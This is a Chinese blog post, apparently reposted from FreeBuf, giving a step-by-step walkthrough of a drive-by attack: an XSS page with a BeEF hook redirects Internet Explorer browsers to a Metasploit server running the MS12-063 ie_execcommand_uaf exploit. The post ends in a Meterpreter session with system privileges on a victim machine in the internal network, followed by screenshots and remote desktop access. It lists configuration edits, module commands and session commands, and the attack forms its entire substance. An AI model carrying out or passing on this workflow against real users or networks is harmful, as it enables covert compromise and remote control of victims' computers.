metasploit利用IE漏洞XSS挂马拿内网主机

网络 专栏收录该内容
103 篇文章 1 订阅

http://www.2cto.com/Article/201407/315176.html

metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用。

用到的工具:beEF+msf

利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf

MS12-063

Automatic
IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

用到的beef+msf

先配置下:

root@kali:~# cd /usr/share/beef-xss/
root@kali:/usr/share/beef-xss# ls
beef           beef_key.pem  config.yaml  db          Gemfile       modules
beef_cert.pem  bundle        core         extensions  Gemfile.lock

编辑下config.yaml 把metasploit :false改成true

再进入extensions/metasploit/

同样修改下config.yaml

把host跟callback_host 改成自己的IP  这里是220.128

再改动下custom   path:

这样beef已经配置好了。那就运行下metasploit

运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass

这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。

账号密码beef 配置文件里面有。beef:beef

那beef已经都OK了。 现在来搞下选择下要显示的页面:

hook.js  运行beef 显示出来的。 别忘记运行下apache。

use exploit/windows/browser/ie_execcommand_uaf

可以自己根据自己的要求来选择。

?
1
<span class = "operator" ><span class = "keyword" >show</span> options</span>

我用xp+ie7

直接访问下我们的页面192.168.220.128/xss/

beef就会显示出来了。

点击 commands-hookeddomain-REDIRECT BROWSER 让他重新跳转到我们msf生成的地址上。beef很多功能。 把地址改成192.168.220.128:8080(msf生成的地址)

我们就会看到msf上面已经显示出来了。 回显了sessions payload可以自己去改。我使用的meterpreter载荷

执行sessions -i

执行sessions -i ID号 可以执行任意命令已经是系统权限

meterpreter > screenshot 
Screenshot saved to: /root/dlsSQBkF.jpeg

就可以看到当前主机的屏幕内容。

也可以rdesktop 远程连接上去。

参数rdesktop  -f ip -u username -p password

这也是一种xss挂马拿内网主机。

注:鄙人每天都在写一些metasploit的玩法,如果有大神有什么好的方法希望告诉我,我更新在空间,分享给大家。

如文中未特别声明转载请注明出自:FreebuF.COM


  • 0
    点赞
  • 0
    评论
  • 1
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值